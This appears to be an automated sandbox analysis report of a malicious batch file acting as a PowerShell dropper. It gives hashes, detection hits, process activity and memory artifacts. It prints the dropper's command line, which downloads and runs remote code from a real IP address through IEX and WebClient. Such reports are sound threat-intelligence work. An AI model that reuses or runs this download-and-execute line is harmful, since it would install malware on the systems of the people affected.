99824d3ef35b84b0fc40214867e3c54e5518491efa1c5c9d796b1acb2cbe81d7

Resubmissions

04-08-2020 12:19

03-08-2020 09:10

Target

2b4587aed40db6e44cbff092b52b841e.bat
Size

218B
MD5

c69dabb8c2f1ca155fb5fe3b0482d0a7
SHA1

b3faaf0bd82fe27b076ec814b2123cf962ead51b
SHA256

99824d3ef35b84b0fc40214867e3c54e5518491efa1c5c9d796b1acb2cbe81d7
SHA512

c5fc762e4d76e921bd55faa68fff86efe13f0b49b7cbeaaf2d4050cbb8e65f400399d84acf4056e36c8f560a8e9a7fd5b9c711fcb0ef23f65f14ea0724eef174

Score

10^/10

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/2b4587aed40db6e44cbff092b52b841e

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

668 3932 WerFault.exe powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

WerFault.exe

description pid process

Token: SeRestorePrivilege 668 WerFault.exe
Token: SeBackupPrivilege 668 WerFault.exe
Token: SeDebugPrivilege 668 WerFault.exe

pid	pid_target	process	target process
668	3932	WerFault.exe	powershell.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

WerFault.exe

ServiceHost packer 6 IoCs

Detects ServiceHost packer used for .NET malware

Processes:

resource	yara_rule
behavioral2/memory/3932-2-0x0000000000000000-mapping.dmp	servicehost
behavioral2/memory/3932-3-0x0000000000000000-mapping.dmp	servicehost
behavioral2/memory/3932-4-0x0000000000000000-mapping.dmp	servicehost
behavioral2/memory/3932-5-0x0000000000000000-mapping.dmp	servicehost
behavioral2/memory/3932-6-0x0000000000000000-mapping.dmp	servicehost
behavioral2/memory/3932-7-0x0000000000000000-mapping.dmp	servicehost

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 3060 wrote to memory of 3932	3060	cmd.exe	powershell.exe
PID 3060 wrote to memory of 3932	3060	cmd.exe	powershell.exe
PID 3060 wrote to memory of 3932	3060	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2b4587aed40db6e44cbff092b52b841e.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3060

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/2b4587aed40db6e44cbff092b52b841e');Invoke-SLSOBOXXDQW;Start-Sleep -s 10000"
2⤵
PID:3932

memory/668-1-0x0000000004E50000-0x0000000004E51000-memory.dmp

Filesize
4KB

Download
memory/668-8-0x0000000005600000-0x0000000005601000-memory.dmp

Filesize
4KB

Download
memory/3932-0-0x0000000000000000-mapping.dmp

Download
memory/3932-2-0x0000000000000000-mapping.dmp

Download
memory/3932-3-0x0000000000000000-mapping.dmp

Download
memory/3932-4-0x0000000000000000-mapping.dmp

Download
memory/3932-5-0x0000000000000000-mapping.dmp

Download
memory/3932-6-0x0000000000000000-mapping.dmp

Download
memory/3932-7-0x0000000000000000-mapping.dmp

Download